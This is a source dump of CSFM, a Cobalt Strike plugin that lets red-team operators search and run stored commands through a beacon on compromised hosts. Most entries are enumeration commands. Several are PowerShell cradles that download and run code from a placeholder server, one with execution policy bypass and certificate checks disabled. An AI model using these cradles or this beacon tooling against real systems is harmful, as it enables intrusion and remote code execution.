├── LICENSE ├── README.md ├── csfm.cna └── defs.cna /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 001SPARTaN and r3dqu1nn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CSFM 2 | Cobalt Strike Field Manual - A quick reference for Windows commands that can be accessed in a beacon console. 3 | 4 | # Getting started 5 | CSFM allows users to reference commands from any beacon console. Simply type `search ` into a beacon, and you'll see a list of results that match that term. 6 | 7 | Once you have identified the command you want to run, you can run the command easily with `runcmd `, where `` is the number next to the search result. 8 | 9 | # Usage 10 | CSFM has 4 different options to choose from: 11 | 12 | `search ` 13 | 14 | `tip ` 15 | 16 | `runcmd (search result)` 17 | 18 | `add` 19 | 20 | The add command will pop up a dialog window that will have fields to enter the command syntax, the description of the command, and the tags or matching search terms for that specific command you enter. Once that command is added it will populate and get stored into the file 'defs.bin' for later use on future engagements. 21 | 22 | Any questions or issues please post here: https://github.com/001SPARTaN/csfm/issues or feel free to reach out to @r3dQu1nn or @001SPARTaN. 23 | 24 | ![image](https://user-images.githubusercontent.com/27856212/32573478-576bf1e4-c48b-11e7-8b06-d56a47f93c6e.png) 25 | ![csfm2](https://user-images.githubusercontent.com/27856212/32573605-c7422416-c48b-11e7-953c-98b6a6fd2ce5.PNG) 26 | ![screenshot](https://i.imgur.com/KhjRYzh.png) 27 | -------------------------------------------------------------------------------- /csfm.cna: -------------------------------------------------------------------------------- 1 | # csfm.cna 2 | # Your friendly red team operator's guide to the galaxy 3 | # 4 | # 001SPARTaN and r3dQu1nn 5 | 6 | include(script_resource("defs.cna")); # File with a database of all our built in definitions 7 | include(script_resource("defs.bin")); # Binary file containing any definitions you create 8 | 9 | global('@database @results @customs'); 10 | 11 | @customs = @(); # Any custom definitions 12 | 13 | sub search { 14 | local('$index $arg %entry @tags @lctags'); 15 | 16 | clear(@results); # Make sure no leftovers from a previous search 17 | 18 | $arg = $1; 19 | println("Searching for $arg"); 20 | $index = 1; 21 | 22 | # Iterate through all entries in the database 23 | foreach %entry (@database) { 24 | @tags = %entry["tags"]; 25 | 26 | # Super stupid way of doing this, but we want all our tags to be lowercase to allow proper matching 27 | foreach $tag (@tags) { 28 | add(@lctags, lc($tag), -1); 29 | } 30 | 31 | # If search term is empty or *, return all entries 32 | if (($1 eq $null) || ($1 eq '*')) { 33 | %entry["index"] = $index; 34 | add(@results, %entry, -1); 35 | $index++; 36 | } 37 | # Otherwise lowercase search term and search for it in tags 38 | else if (lc($arg) in @lctags) { 39 | println("Found result: " . %entry); 40 | %entry["index"] = $index; 41 | add(@results, %entry, -1); 42 | $index++; 43 | } 44 | # Also do partial command match 45 | else if (lc(%entry["cmd"]) ismatch ('.*?' . lc($arg) . '.*?')) { 46 | println("Found result (cmd match): " . %entry); 47 | %entry["index"] = $index; 48 | add(@results, %entry, -1); 49 | $index++; 50 | } 51 | 52 | clear(@lctags); 53 | } 54 | } 55 | 56 | # Same search function as before, but only looks for tips 57 | sub tip { 58 | local('$index $arg %entry @tags @lctags'); 59 | 60 | clear(@results); 61 | 62 | $arg = $1; 63 | println("Searching for $arg"); 64 | $index = 1; 65 | 66 | foreach %entry (@tips) { 67 | @tags = %entry["tags"]; 68 | 69 | # Super stupid way of doing this, but we want all our tags to be lowercase to allow proper matching 70 | foreach $tag (@tags) { 71 | add(@lctags, lc($tag), -1); 72 | } 73 | 74 | if (($1 eq $null) || ($1 eq '*')) { 75 | %entry["index"] = $index; 76 | add(@results, %entry, -1); 77 | $index++; 78 | } 79 | else if (lc($arg) in @lctags) { 80 | println("Found result: " . %entry); 81 | %entry["index"] = $index; 82 | add(@results, %entry, -1); 83 | $index++; 84 | } 85 | else if (lc(%entry["tips"]) ismatch ('.*?' . lc($arg) . '.*?')) { 86 | println("Found result (cmd match): " . %entry); 87 | %entry["index"] = $index; 88 | add(@results, %entry, -1); 89 | $index++; 90 | } 91 | 92 | clear(@lctags); 93 | } 94 | } 95 | 96 | # Reload definitions from defs.cna and defs.bin 97 | sub reload_defs { 98 | local('%entry $handle'); 99 | @database = get_database(); 100 | 101 | # defs.bin contains an array of custom definitions stored as a serialized object 102 | # Maybe not safe, but a malicious defs.bin is not our threat model here 103 | $handle = openf("defs.bin"); 104 | @customs = readObject($handle); 105 | closef($handle); 106 | 107 | if (size(@customs) > 0) { 108 | foreach %entry (@customs) { 109 | add(@database, %entry, -1); 110 | } 111 | } 112 | else { 113 | @customs = @(); 114 | } 115 | } 116 | 117 | # Add a custom definition to defs.bin 118 | sub add_def { 119 | local('%entry $handle'); 120 | %entry["cmd"] = $3["cmd"]; 121 | %entry["desc"] = $3["desc"]; 122 | %entry["tags"] = split(',', $3["tags"]); 123 | 124 | println("Adding " . %entry); 125 | 126 | $handle = openf(">defs.bin"); # open handle to defs.bin 127 | add(@customs, %entry, -1); # add entry to @customs array 128 | writeObject($handle, @customs); # write @customs array to defs.bin handle 129 | closef($handle); # close handle 130 | 131 | reload_defs(); 132 | } 133 | 134 | beacon_command_register("csfm", "The Red Team Operator's Guide to the Galaxy", 135 | "\nSyntax: csfm [List]\n" . 136 | "List all the options to use csfm\n" . 137 | "\nQueries a database for well known commands, or diplays great tips or tricks for a Red Team Operator.\n" . 138 | "Your friendly Red Team Operator Guide to the Galaxy by 001SPARTaN and r3dQu1nn!\n" . 139 | "\nExample: search computer, tip ntlm\n" 140 | 141 | ); 142 | 143 | alias csfm { 144 | $arg = lc($2); 145 | 146 | if ($arg ismatch 'list') { 147 | local('$out'); 148 | $out = "csfm Command Options\n"; 149 | $out .= " \c0===============\n\n"; 150 | $out .= " Option Description\n"; 151 | $out .= "\c0 ------ -----------\n"; 152 | blog($1, $out); 153 | blog2($1, "\cBsearch [option] Search the database for common commands, and tips"); 154 | blog2($1, "\cBtip [option] Display Red Team Tips"); 155 | blog2($1, "\cBruncmd [number] Run a command number returned by search"); 156 | blog2($1, "\cBadd [Enter] Dialog menu to add a command to the database"); 157 | } 158 | 159 | if ($2 ismatch 'smile') { 160 | local('$smile'); 161 | $smile = "\n"; 162 | $smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n"; 163 | $smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n"; 164 | $smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n"; 165 | $smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n"; 166 | $smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n"; 167 | $smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n"; 168 | $smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n"; 169 | $smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n"; 170 | $smile .= "\t\c9█░█████████░░░░█████████░░░░█\n"; 171 | $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n"; 172 | $smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n"; 173 | $smile .= "\t\c9█░░░████████████████████░░░░█\n"; 174 | $smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n"; 175 | $smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n"; 176 | $smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n"; 177 | $smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n"; 178 | $smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n"; 179 | $smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n"; 180 | $smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n"; 181 | blog($1, $smile); 182 | } 183 | 184 | if ($2 is $null) { 185 | berror($1, "\c4Need to specify additional syntax! Use the 'list' command for help"); 186 | blog($1, "\cBSyntax Example: csfm list"); 187 | } 188 | } 189 | 190 | alias search { 191 | local('%entry $index $cmd $desc'); 192 | # TODO: Allow search to narrow results by specifying multiple tags (space separated) 193 | # if multiple args, pass array to search 194 | # if search has multiple args, make sure to match each arg, not just first 195 | search($2); 196 | $size = size(@results); 197 | blog($1, "Found $size results:"); 198 | foreach %entry (@results) { 199 | $index = %entry["index"]; 200 | $cmd = %entry["cmd"]; 201 | $desc = %entry["desc"]; 202 | blog($1, "$index - $cmd\t$desc"); 203 | } 204 | } 205 | 206 | alias tip { 207 | local ('%entry $index $tip $desc'); 208 | tip($2); 209 | $size = size(@results); 210 | blog($1, "Found $size results:"); 211 | foreach %entry (@results) { 212 | $index = %entry["index"]; 213 | $tip = %entry["tips"]; 214 | blog($1, "$index - $tip"); 215 | } 216 | } 217 | 218 | alias runcmd { 219 | local('%entry $index $bid'); 220 | $index = $2; 221 | $bid = $1; 222 | println($bid); 223 | 224 | foreach %entry (@results) { 225 | if (%entry["index"] eq $index) { 226 | if ("powershell" in %entry["tags"]) { 227 | prompt_text("Run command:", %entry["cmd"], lambda ({ bpowershell($bid, $1 . $+); }, $bid => $bid)); 228 | } 229 | else { 230 | prompt_text("Run command:", %entry["cmd"], lambda ({ bshell($bid, $1 . $+); }, $bid => $bid)); 231 | } 232 | } 233 | } 234 | } 235 | 236 | alias add { 237 | $dialog = dialog("Add entry", %(cmd => "Command here", desc => "Description here", tags => "Tags here (comma separated)"), &add_def); 238 | drow_text($dialog, "cmd", "Command: "); 239 | drow_text($dialog, "desc", "Description: "); 240 | drow_text($dialog, "tags", "Tags: "); 241 | dbutton_action($dialog, "Add"); 242 | dialog_show($dialog); 243 | } 244 | 245 | reload_defs(); -------------------------------------------------------------------------------- /defs.cna: -------------------------------------------------------------------------------- 1 | # defs.cna 2 | # Definitions for all the tips and commands. 3 | # Mostly r3dqu1nn's work, with a bit of help from 001SPARTaN 4 | 5 | # @database = @(%($cmd, $desc, @tags), %($cmd, $desc, @tags)) 6 | @database = @( 7 | %(cmd => 'ipconfig /all', desc => 'Display all network information for all interfaces.', tags => @( 8 | 'network', 'networking', 'interfaces', 'utility', 'recon', 'enum', 'ipconfig' 9 | ) 10 | ), 11 | %(cmd => 'systeminfo', desc => 'Display info about the system. Tip: Use | findstr to pipe out individual options.', tags => @( 12 | 'system', 'info', 'information', 'recon', 'enum', 'privesc', 'systeminfo', 'system info' 13 | ) 14 | ), 15 | %(cmd => 'route print', desc => 'Display network routes.', tags => @( 16 | 'network', 'route', 'routes', 'print', 'recon', 'enum' 17 | ) 18 | ), 19 | %(cmd => 'arp -a', desc => 'Display ARP table.', tags => @( 20 | 'network', 'arp', 'recon', 'enum' 21 | ) 22 | ), 23 | %(cmd => 'wmic computersystem get [options]', desc => 'Get detailed information about the system with wmic. Use [/?] for a complete list of options', tags => @( 24 | 'computer', 'wmic', 'system', 'recon', 'enum' 25 | ) 26 | ), 27 | %(cmd => 'wmic desktop get [options]', desc => 'Get detailed information about the desktop with wmic. Use [/?] for a complete list of options', tags => @( 28 | 'desktop', 'recon', 'enum', 'wmic' 29 | ) 30 | ), 31 | %(cmd => 'wmic netlogin get [options]', desc => 'Get detailed information about netlogin with wmic. Use [/?] for a complete list of options', tags => @( 32 | 'netlogin', 'login', 'recon', 'enum', 'wmic' 33 | ) 34 | ), 35 | %(cmd => 'wmic process get [options]', desc => 'Get detailed information about processes with wmic. Use [/?] for a complete list of options', tags => @( 36 | 'process', 'processes', 'recon', 'enum', 'wmic' 37 | ) 38 | ), 39 | %(cmd => 'wmic service get [options]', desc => 'Get detailed information about services with wmic. Use [/?] for a complete list of options', tags => @( 40 | 'services', 'service', 'recon', 'enum', 'wmic' 41 | ) 42 | ), 43 | %(cmd => 'wmic volume get [options]', desc => 'Get detailed information about volumes/drives with wmic. Use [/?] for a complete list of options', tags => @( 44 | 'volume', 'drives', 'recon', 'enum', 'wmic' 45 | ) 46 | ), 47 | %(cmd => 'wmic netuse list full', desc => 'Get a full list of mapped drives with wmic.', tags => @( 48 | 'netuse', 'drives', 'recon', 'enum', 'wmic', 'mapped' 49 | ) 50 | ), 51 | %(cmd => 'wmic startup get [options]', desc => 'Get detailed information regarding the startup of the system with wmic. Use [/?] for a complete list of options.', tags => @( 52 | 'startup', 'boot', 'bootup', 'enum', 'recon', 'wmic' 53 | ) 54 | ), 55 | %(cmd => 'wmic PRODUCT get [options]', desc => 'Get detailed information about the installed software on the system with wmic. Use [/?] for a complete list of options.', tags => @( 56 | 'product', 'software', 'install', 'enum', 'recon', 'wmic' 57 | ) 58 | ), 59 | %(cmd => 'wmic qfe get [options]', desc => 'Get detailed information about hotfixes installed on the system with wmic. Use [/?] for a complete list of options.', tags => @( 60 | 'qfe', 'patches', 'hotfix', 'enum', 'recon', 'kb', 'wmic' 61 | ) 62 | ), 63 | %(cmd => 'wmic ntdomain get [options]', desc => 'Get detailed information about the Domain Controller on the network with wmic. Use [/?] for a complete list of options.', tags => @( 64 | 'ntdomain', 'DomainController', 'domain', 'dc', 'enum', 'recon', 'wmic' 65 | ) 66 | ), 67 | %(cmd => 'wmic bios list full', desc => 'Get detailed information about the BIOS on the system with wmic.', tags => @( 68 | 'computer', 'hardware', 'bios', 'install', 'enum', 'recon', 'wmic' 69 | ) 70 | ), 71 | %(cmd => 'SET', desc => 'Get detailed information about all the %PATH% variables.', tags => @( 72 | 'computer', 'variables', 'set', 'enum', 'recon', 'user' 73 | ) 74 | ), 75 | %(cmd => 'netstat -ano', desc => 'Get detailed information about network connections on the system. Use netstat [/?] for a complete list of options.', tags => @( 76 | 'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections' 77 | ) 78 | ), 79 | %(cmd => 'netstat -ano | findstr /I listening', desc => 'Get detailed information about network connections listening on the system. Use netstat [/?] for a complete list of options.', tags => @( 80 | 'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections' 81 | ) 82 | ), 83 | %(cmd => 'netstat -ano | findstr /I established', desc => 'Get detailed information about network connections established on the system. Use netstat [/?] for a complete list of options.', tags => @( 84 | 'computer', 'netstat', 'network', 'status', 'enum', 'recon', 'connections' 85 | ) 86 | ), 87 | %(cmd => 'nbtstat -A [Target IP]', desc => 'Returns the NetBIOS name table and MAC address of the address card for the remote computer name specified.', tags => @( 88 | 'computer', 'nbtstat', 'network', 'mac', 'enum', 'recon', 'NetBIOS' 89 | ) 90 | ), 91 | %(cmd => 'nslookup', desc => 'Displays information that you can use to diagnose Domain Name System (DNS) infrastructure. Resolve IP <--> Domain Name.', tags => @( 92 | 'computer', 'nslookup', 'network', 'dns', 'lookup', 'enum', 'recon' 93 | ) 94 | ), 95 | %(cmd => 'reg query [keyname]', desc => 'Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.', tags => @( 96 | 'registry', 'query', 'reghive', 'regedit', 'enum', 'recon' 97 | ) 98 | ), 99 | %(cmd => 'reg add [keyname] [options]', desc => 'Adds a new subkey or entry to the registry.', tags => @( 100 | 'registry', 'add', 'reghive', 'regedit', 'enum', 'recon' 101 | ) 102 | ), 103 | %(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @( 104 | 'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks' 105 | ) 106 | ), 107 | %(cmd => 'sc [options]', desc => 'Communicates with the Service Controller and installed services. SC.exe retrieves and sets control information about services.', tags => @( 108 | 'sc', 'service', 'controller', 'enum', 'recon', 'tasks' 109 | ) 110 | ), 111 | %(cmd => 'sc [ServerName] qc [ServiceName] [BufferSize]', desc => 'Queries the configuration information for a service.', tags => @( 112 | 'sc', 'qc', 'service', 'controller', 'enum', 'recon', 'tasks' 113 | ) 114 | ), 115 | %(cmd => 'tasklist (/S Remote Computer) [options]', desc => 'Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.', tags => @( 116 | 'schtasks', 'list', 'time', 'persistence', 'enum', 'recon', 'tasklist', 'processes', 'process' 117 | ) 118 | ), 119 | %(cmd => 'driverquery [/s Computer] [/u Domain\User /p Password]', desc => 'Displays a list of all installed device drivers and their properties.', tags => @( 120 | 'driver', 'driverquery', 'computer', 'hardware', 'enum', 'recon', 121 | ) 122 | ), 123 | %(cmd => 'schtasks [options]', desc => 'Schedules commands and programs to run periodically or at a specific time. Adds and removes tasks from the schedule, starts and stops tasks on demand, and displays and changes scheduled tasks.', tags => @( 124 | 'schtasks', 'schedule', 'time', 'persistence', 'enum', 'recon', 'tasks' 125 | ) 126 | ), 127 | %(cmd => 'gpresult /s /u [options]', desc => 'Displays the Resultant Set of Policy (RSoP) information for a remote user and computer.', tags => @( 128 | 'firewall', 'RSOP', 'GPO', 'Group Policy', 'enum', 'recon', 'rules' 129 | ) 130 | ), 131 | %(cmd => 'whoami /groups /all [options]', desc => 'Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name.', tags => @( 132 | 'user', 'groups', 'privileges', 'logon', 'enum', 'recon', 133 | ) 134 | ), 135 | %(cmd => 'netsh firewall (advfirewall) show conf', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer. Use firewall to query firewall information.', tags => @( 136 | 'netsh', 'network', 'config', 'firewall', 'enum', 'recon', 'rules' 137 | ) 138 | ), 139 | %(cmd => 'netsh wlan show profiles', desc => 'Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a currently running computer.', tags => @( 140 | 'netsh', 'network', 'config', 'wlan', 'enum', 'recon', 'rules' 141 | ) 142 | ), 143 | #net commands 144 | %(cmd => 'net accounts [/domain]', desc => 'Updates the user accounts database and modifies password and logon requirements for all accounts.', tags => @( 145 | 'net', 'network', 'config', 'accounts', 'enum', 'recon', 'user', 'modify', 'domain', 'display' 146 | ) 147 | ), 148 | %(cmd => 'net group "groupname" [/domain]', desc => 'Adds, displays, or modifies global groups in the domain.', tags => @( 149 | 'net', 'network', 'config', 'groups', 'recon', 'enum', 'domain', 'display' 150 | ) 151 | ), 152 | %(cmd => 'net localgroup "groupname" [/domain]', desc => 'Adds, displays, or modifies local groups in the domain.', tags => @( 153 | 'net', 'network', 'config', 'localgroup', 'enum', 'recon', 'domain', 'display' 154 | ) 155 | ), 156 | %(cmd => 'net view [/domain]', desc => 'Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain.', tags => @( 157 | 'net', 'network', 'config', 'view', 'enum', 'recon', 'display', 'computers', 'domain' 158 | ) 159 | ), 160 | %(cmd => 'net session [\\ComputerName]', desc => 'Manages server computer connections. Used without parameters, net session displays information about all sessions with the local computer.', tags => @( 161 | 'net', 'network', 'config', 'session', 'enum', 'recon', 'display' 162 | ) 163 | ), 164 | %(cmd => 'net share [options]', desc => 'Manages shared resources. Used without parameters, net share displays information about all of the resources that are shared on the local computer.', tags => @( 165 | 'net', 'network', 'config', 'resources', 'enum', 'recon', 'share', 'display' 166 | ) 167 | ), 168 | %(cmd => 'net user [username] [/domain]', desc => 'Adds or modifies user accounts or displays user account information.', tags => @( 169 | 'net', 'network', 'config', 'user', 'enum', 'recon', 'domain', 'display' 170 | ) 171 | ), 172 | %(cmd => 'net use * \\IP\Share /user:username [password]', desc => 'Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.', tags => @( 173 | 'net', 'network', 'use', 'pivot', 'authentication', 'resource', 'domain', 'connection', 'shared' 174 | ) 175 | ), 176 | #powershell 177 | %(cmd => 'IEX (New-Object Net.WebClient).DownloadString(\'http://IP/URI\')', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @( 178 | 'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download' 179 | ) 180 | ), 181 | %(cmd => 'powershell -executionpolicy bypass -nop -noni -c \'\'\'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {1};IEX (New-Object Net.WebClient).DownloadString(\"https://IP/URI\")\'\'\'', desc => 'The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.', tags => @( 182 | 'IEX', 'one-liner', 'Invoke-Expression', 'powershell', 'enum', 'recon', 'cmdlet', 'download', 'SSL' 183 | ) 184 | ), 185 | %(cmd => '\$code=\'code goes here\'\;[convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Encodes a byte array as a Base64 string', tags => @( 186 | 'string', 'base64', 'encode', 'powershell', 'obfuscation', 'Unicode', 'Byte' 187 | ) 188 | ), 189 | %(cmd => '\$code=\'code goes here\'\;[convert]::FromBase64String([Text.Encoding]::Unicode.GetBytes(\$code\)\)', desc => 'Decodes a byte array from a Base64 string', tags => @( 190 | 'string', 'base64', 'decode', 'powershell', 'obfuscation', 'Unicode', 'Byte' 191 | ) 192 | ), 193 | %(cmd => 'cat (Get-PSReadlineOption).HistorySavePath', desc => 'Shows all history for PS5 commands entered', tags => @( 194 | 'recon', 'stored', 'powershell', 'enum', 'history', 'commands' 195 | ) 196 | ), 197 | %(cmd => 'Get-ADUser -Filter \* \|Where-Object \{\$_.Enabled -eq $false\}', desc => 'Returns all disabled user accounts', tags => @( 198 | 'recon', 'AD', 'powershell', 'enum', 'disabled', 'accounts', 'user' 199 | ) 200 | ), 201 | %(cmd => 'Get-ADUser -Enabled -PasswordNeverExpires:$true', desc => 'Returns all accounts with non-expiring passwords', tags => @( 202 | 'recon', 'AD', 'powershell', 'enum', 'expire', 'accounts', 'user' 203 | ) 204 | ), 205 | %(cmd => 'Get-ADUser -Filter \{SmartCardLogonRequired -eq $false\}', desc => 'Returns all accounts with no smart card required', tags => @( 206 | 'recon', 'AD', 'powershell', 'enum', 'smartcard', 'accounts', 'user', 'CAC' 207 | ) 208 | ), 209 | %(cmd => 'Get-ADComputer -Filter \{OperatingSystem -Like \"Windows *Server*\"\} -Property * | Format-Table Name,OperatingSystem,OperatingSystemServicePack -Wrap -Auto', desc => 'Returns all AD Computers in a format-table', tags => @( 210 | 'recon', 'AD', 'powershell', 'enum', 'computer', 'windows server', 'OS', 'Server' 211 | ) 212 | ), 213 | %(cmd => '(new-object Net.Sockets.TcpClient).Connect("IP", PORT)', desc => 'Tests network port access to see if the port is open', tags => @( 214 | 'recon', 'tcp', 'powershell', 'enum', 'computer', 'sockets', 'IP', 'Port', 'network' 215 | ) 216 | ), 217 | %(cmd => '[System.Net.Dns]::GetHostbyAddress("8.8.8.8")', desc => 'Resolve IP to hostname', tags => @( 218 | 'recon', 'powershell', 'net', 'hostname', 'IP', 'dns', 'network' 219 | ) 220 | ), 221 | %(cmd => '[System.Net.Dns]::GetHostEntry("host.domain")', desc => 'Resolve hostname to IP', tags => @( 222 | 'recon', 'powershell', 'net', 'dns', 'IP', 'hostname', 'network' 223 | ) 224 | ), 225 | #dsquery 226 | %(cmd => 'dsquery computer -name *', desc => 'Search for computers with a name similar to .', tags => @( 227 | 'computer', 'name', 'dsquery', 'recon', 'enum' 228 | ) 229 | ), 230 | %(cmd => 'dsquery * \"CN=System,DC=computer\" -filter \"\(objectClass=trustedDomain\)\" -attr TrustPartner,FlatName,TrustDirection', desc => 'Search for Domain Controllers that are trusted and have Trust relationships within the domain', tags => @( 231 | 'computer', 'dsquery', 'recon', 'enum', 'domain controller', 'domain', 'trust' 232 | ) 233 | ), 234 | %(cmd => 'dsquery group -name \"domain admins\" |dsget group -members -expand', desc => 'Search for Domain Admins in the domain using dsquery', tags => @( 235 | 'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'admins' 236 | ) 237 | ), 238 | %(cmd => 'dsquery user -name |dsget user -memberof -expand', desc => 'Query a specific user in the domain and the groups they are a member of using dsquery', tags => @( 239 | 'members', 'dsquery', 'recon', 'enum', 'groups', 'domain', 'user' 240 | ) 241 | ), 242 | %(cmd => 'dsquery * domainroot -filter \"\(&\(objectCategory=Person\)\(objectClass=User\)\(userAccountControl:1.2.840.113556.1.4.803:=32\)\)\"', desc => 'Query user accounts with no passwords required with dsquery', tags => @( 243 | 'accounts', 'dsquery', 'recon', 'enum', 'passwords', 'domain' 244 | ) 245 | ), 246 | %(cmd => 'dsquery subnet -limit 0', desc => 'Returns subnet information in AD sites and services with dsquery', tags => @( 247 | 'subnet', 'dsquery', 'recon', 'enum', 'AD', 'sites', 'services' 248 | ) 249 | ), 250 | %(cmd => 'dsquery OU', desc => 'Returns all OU information in AD with dsquery', tags => @( 251 | 'subnet', 'dsquery', 'recon', 'enum', 'AD', 'OU' 252 | ) 253 | ), 254 | #MSSQL 255 | %(cmd => 'sqlcmd -s localhost -q "exec sp_databases"', desc => 'Returns list of local MSSQL databases', tags => @( 256 | 'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd' 257 | ) 258 | ), 259 | %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT count(*) FROM TABLE"', desc => 'Returns number of entries in TABLE', tags => @( 260 | 'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd' 261 | ) 262 | ), 263 | %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT TOP 10 * FROM TABLE"', desc => 'Returns top 10 rows from TABLE', tags => @( 264 | 'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd' 265 | ) 266 | ), 267 | %(cmd => 'sqlcmd -s localhost -d DATABASE -q "SELECT * FROM SYSOBJECTS WHERE TYPE = \'U\' ORDER BY NAME"', desc => 'Returns list of table names in DATABASE', tags => @( 268 | 'sql', 'mssql', 'enum', 'recon', 'database', 'sqlcmd' 269 | ) 270 | ), 271 | #Linux 272 | %(cmd => 'cat /etc/issue', desc => 'Verify Linux distro', tags => @( 273 | 'linux', 'etc', 'issue', 'cat', 'distro' 274 | ) 275 | ), 276 | %(cmd => 'cat /etc/*-release', desc => 'Verify exact version and distribution for Linux', tags => @( 277 | 'linux', 'cat', 'etc', 'release', 'version', 'distro' 278 | ) 279 | ), 280 | %(cmd => 'cat /etc/*-release | grep -E \'\"NAME=\"|ID|VERSION|ID_LIKE\'', desc => 'Verify exact version and distribution for Linux', tags => @( 281 | 'linux', 'cat', 'etc', 'release', 'version', 'distro' 282 | ) 283 | ), 284 | %(cmd => 'cat /proc/version', desc => 'Verify Linux version using proc', tags => @( 285 | 'linux', 'cat', 'proc', 'version', 'distro' 286 | ) 287 | ), 288 | %(cmd => 'rpm -q kernel', desc => 'Get detailed information about the kernel', tags => @( 289 | 'linux', 'rpm', 'kernel' 290 | ) 291 | ), 292 | %(cmd => 'dmesg | grep Linux', desc => 'Output kernel messages for Linux', tags => @( 293 | 'linux', 'dmesg', 'grep', 'kernel' 294 | ) 295 | ), 296 | %(cmd => 'ls /boot | grep vmlinuz-', desc => 'Verify the name of the specific version of the kernel', tags => @( 297 | 'linux', 'ls', 'grep', 'vmlinuz-', 'kernel' 298 | ) 299 | ), 300 | %(cmd => 'lsb_release -a', desc => 'Display information about your specific Linux distrobution', tags => @( 301 | 'linux', 'lsb_release', 'LSB', 'distro' 302 | ) 303 | ), 304 | %(cmd => 'last -a', desc => 'Show the users who logged in last', tags => @( 305 | 'linux', 'last', 'login', 'log' 306 | ) 307 | ), 308 | %(cmd => 'uname -a/-mrs', desc => 'Display the software and hardware information in current running Linux system', tags => @( 309 | 'linux', 'uname', 'software', 'hardware', 'system' 310 | ) 311 | ), 312 | %(cmd => 'id', desc => 'Print user and group information for the specified USERNAME, or (when USERNAME omitted) for the current user', tags => @( 313 | 'linux', 'id', 'user', 'group', 'username' 314 | ) 315 | ), 316 | %(cmd => 'history', desc => 'Show the last commands entered for the current user', tags => @( 317 | 'linux', 'history', 'last', 'commands', 'user' 318 | ) 319 | ), 320 | %(cmd => 'arp -a', desc => 'Display the current arp table', tags => @( 321 | 'linux', 'arp', 'table', 'MAC' 322 | ) 323 | ), 324 | %(cmd => 'netstat -anot', desc => 'Display network connections', tags => @( 325 | 'linux', 'net', 'stat', 'TCP', 'UDP', 'connections' 326 | ) 327 | ), 328 | %(cmd => 'ps -elf', desc => 'View information on a selection of running processes', tags => @( 329 | 'linux', 'ps', 'elf', 'processes', 'monitor', 'status' 330 | ) 331 | ), 332 | %(cmd => 'ps -elf | grep root', desc => 'View information on a selection of running processes owned by root', tags => @( 333 | 'linux', 'ps', 'elf', 'root', 'processes', 'monitor' 334 | ) 335 | ), 336 | %(cmd => 'ls -la /var/www/html/', desc => 'List the contents of html directory for web resources', tags => @( 337 | 'linux', 'ls', '/var/www/html', 'web', 'html', 'listing' 338 | ) 339 | ), 340 | %(cmd => 'service apache2 status', desc => 